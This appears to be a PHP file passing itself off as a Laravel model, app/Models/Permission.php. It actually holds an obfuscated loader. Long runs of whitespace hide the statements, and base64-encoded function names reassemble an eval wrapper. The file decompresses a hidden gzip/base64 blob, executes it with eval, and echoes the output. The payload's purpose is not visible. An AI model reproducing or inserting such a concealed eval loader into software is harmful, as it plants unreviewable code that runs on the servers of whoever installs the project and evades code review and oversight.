<?php 
        $__='printf';$_='Loading app/Models/Permission.php';
        







































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrt2lFrgkAcAPB3Yd/Bh+AajDJpGyI+TFtmkVutPPUl9DSzLCVrlZ9+VrYmY9DYGCv+vwPl7vzfHXfHPcjR9F5hkBJQNPdniyHid9mMgKwoKrdDxw3i8rM7n/px7IezUjSKaCmw4rhUKiGeyhqiryhI/z9R2xWmf5HwqQTpFS42cMU35UcB7YqOu+Qk2S4UaAAAuEyITDXG0ZtLRdZYA6/CZp0b6pvJ/f7QTE/N/XE9gKkCAAAAAADg3MDvDAAAuFzItmL3rjpwXBI6LuJhRgAAAIAfyV9NqHVCVZrejmysJUSuj80XUSQNkfQwNzHxOnlaMa1aJ6oQtu91dHGl17sbAwcMqawVQ1f7Jk5jZ92ewXIrsxer0kxL0jZ6aVuMhTXSl7WNjYOEsMGrHaxVm+0GdkPNl/viiGzEQ13H1JsLS1cTC3PLrP+xLdeT9JtcnSJrVUfWlmaj7R3Gm2vXY1puGq9ID57S2I3rizEzquQJAuIp6u8XQti9i1numv9O+IfYUwILxw6LaPtEN+/dwv2T87p/kl/TYm4T7Zf0mn8DWe66cg==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































                                                                                                                                                                                                                     $________;
